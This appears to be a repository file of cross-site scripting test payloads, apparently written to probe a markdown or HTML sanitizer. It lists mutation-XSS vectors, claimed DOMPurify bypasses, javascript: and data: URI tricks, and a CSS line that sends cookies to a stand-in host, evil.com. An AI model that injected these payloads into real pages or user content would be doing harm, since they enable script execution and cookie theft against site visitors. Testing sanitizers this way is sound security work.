File size: 1,373 Bytes
ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd ad75efa 576f2dd | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 | ---
language: en
license: mit
---
# Advanced XSS
## T1: mXSS via noscript
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
## T2: mXSS via math
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(2)>
## T3: mXSS via svg/foreignObject
<svg><foreignObject><div><style><!--</style><img src=x onerror=alert(3)></div></foreignObject></svg>
## T4: DOMPurify bypass via namespace confusion
<svg><a><rect width="100" height="100"/><animate attributeName="href" values="javascript:alert(4)"/></a></svg>
## T5: DOMPurify bypass via use
<svg><use href="data:image/svg+xml,<svg id=x xmlns=http://www.w3.org/2000/svg><image href=1 onerror=alert(5) /></svg>#x" />
## T6: CSS injection
<p style="background:url(javascript:alert(6))">test</p>
<p style="background-image:url(https://evil.com/track?cookie=)">CSS exfil</p>
## T7: Custom protocol handler
<a href="hf://models/test">HF Protocol</a>
## T8: Form with formaction
<button formaction="javascript:alert(8)">test</button>
<input type="image" src=x onerror="alert(8)">
## T9: Anchor with data URI
<a href="data:text/html,<script>alert(9)</script>">Click</a>
## T10: Template literal
<template><script>alert(10)</script></template>
<xmp><script>alert(10)</script></xmp>
## T11: Markdown link tricks
[test](https://evil.com "onclick=alert(11)")
[test](https://evil.com" onclick="alert(11))
|